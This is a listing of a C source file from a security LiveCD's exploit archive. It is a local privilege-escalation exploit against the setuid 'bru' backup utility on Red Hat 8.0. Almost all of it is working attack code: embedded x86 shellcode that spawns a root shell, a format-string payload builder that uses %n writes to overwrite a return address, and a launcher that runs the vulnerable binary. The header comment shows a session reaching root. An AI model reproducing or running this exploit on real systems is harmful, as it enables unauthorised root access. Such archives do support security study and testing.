home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / backup / bru / 0x333bru-fmtx.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  3KB  |  112 lines
  1. /*
  2. *  bru--format--root-expolit::^^)
  3. *   
  4. *  coded by nic
  6. * (c) 0x333 Outsiders Security Labs / www.0x333.org
  7. * test in redhat 8.0
  8. * bash-2.05b$ ls -al bru
  9. * -rws--x--x 1 root bin 165836 11├ª29 1999 bru
  10. * bash-2.05b$ id
  11. * uid=37(rpm) gid=37(rpm) groups=37(rpm)
  12. * bash-2.05b$ ./bruex
  13. * Use shellcode 0xc4ffff65
  14. * sh-2.05b#
  15. * ths : sam @ SST Group
  16. */
  17.  
  18. #include <stdio.h>
  19. #include <strings.h>
  20. #include <string.h>
  21. #include <stdlib.h>
  22. #include <signal.h>
  23. #include <unistd.h>
  24. #include <errno.h>
  25.  
  26. #define MAX_FMT_LENGTH 128
  27. #define ADD 0x100
  28. #define FOUR sizeof( size_t ) * 4
  29. #define HELL "./bru"
  30. #define OCT( b0, b1, b2, b3, addr, str ) { \
  31. b0 = (addr >> 24) & 0xff; \
  32. b1 = (addr >> 16) & 0xff; \
  33. b2 = (addr >> 8) & 0xff; \
  34. b3 = (addr ) & 0xff; \
  35. if ( b0 * b1 * b2 * b3 == 0 ) { \
  36. printf( "\n%s contains a NUL byte. Leaving...\n", str ); \
  37. exit( EXIT_FAILURE ); \
  38. } \
  39. }
  40.  
  41. / shell by sam/
  42. char shellcode[]= 
  43. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  44. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  45. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  46. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  47. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  48. "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
  49. /* shellcode */
  50. "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31"
  51. "\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
  52. "\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff"
  53. "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
  54. int
  55. build_un( char * buf, unsigned int locaddr, unsigned int retaddr, unsigned int
  56. offset, unsigned int base )
  57. {
  58. unsigned char b0, b1, b2, b3;
  59. int start = ( (base / ADD) + 1 ) * ADD;
  60. int sz;
  61.  
  62. OCT( b0, b1, b2, b3, locaddr, "[ locaddr ]" );
  63. sz = snprintf( buf, FOUR + 1, /* 16 char to have the 4 addresses */
  64. "%c%c%c%c" /* + 1 for the ending \0 */
  65. "%c%c%c%c"
  66. "%c%c%c%c"
  67. "%c%c%c%c",
  68. b3, b2, b1, b0,
  69. b3 + 1, b2, b1, b0,
  70. b3 + 2, b2, b1, b0,
  71. b3 + 3, b2, b1, b0 );
  72.  
  73. OCT( b0, b1, b2, b3, retaddr, "[ retaddr ]" );
  74.  
  75. return snprintf( buf + sz, MAX_FMT_LENGTH,
  76. "%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n%%%dx%%%d$n",
  77. b3 - FOUR + start - base, offset,
  78. b2 - b3 + start, offset + 1,
  79. b1 - b2 + start, offset + 2,
  80. b0 - b1 + start, offset + 3 );
  81. }
  82.  
  83. int main()
  84. {
  85. int ret_addr;
  86. char buf[256];
  87. char *args[24];
  88. char *env[2];
  89.  
  90. ret_addr = 0xc4fffffa - strlen(shellcode) - strlen(HELL);
  91.  
  92. /* put in env */
  93. env[0] = shellcode;
  94. env[1] = NULL;
  95.  
  96. printf ("Use shellcode 0x%x\n", ret_addr);
  97.  
  98. memset(buf, 0, sizeof(buf));
  99. build_un(buf, 0x08070148, 0x97d7d741, 73 ,3);
  100.  
  101. args[0] = HELL;
  102. args[1] = buf;
  103. args[2] = NULL;
  104.  
  105. execve (args[0], args, env);
  106. perror ("execve");
  107.  
  108. return 0;
  109. }
  110.  
  111.  
  112.